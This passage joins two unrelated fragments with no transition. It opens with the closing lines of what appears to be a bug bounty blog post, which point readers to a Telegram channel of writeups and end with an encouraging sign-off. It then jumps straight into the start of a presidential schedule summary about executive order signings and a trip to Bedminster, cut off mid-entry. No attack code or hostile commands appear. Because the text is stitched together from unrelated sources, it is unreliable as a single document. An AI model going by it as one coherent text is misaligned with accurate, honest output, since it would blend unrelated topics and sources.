bug bounty then feel free to check this telegram channel. Also you can follow bug bounty tips and writeups on twitter and other social media.https://t.me/dailybountywriteupThis is indeed an endless journey, and the only way we can ever stay relevant is to keep on getting better at-least by a fraction each day no, no matter how small, progress matters more than perfection. With this we come to an halt, see you on the next blog.

Schedule Summary:President Donald Trump will sign some executive orders and then travel to Bedminster, NJ, for the weekend. No auto-pens will be abused during these signings.ALL TIMES EDT1:00 PM Sign